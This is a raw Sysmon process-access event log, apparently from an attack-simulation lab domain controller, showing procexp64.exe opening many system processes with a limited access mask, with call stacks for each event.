15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787022Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787021Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787020Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787019Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787018Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787017Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787016Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787015Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787014Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787013Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787012Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787011Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787010Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787009Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787008Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787007Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787006Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787005Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787004Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787003Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787002Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787001Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787000Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786999Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 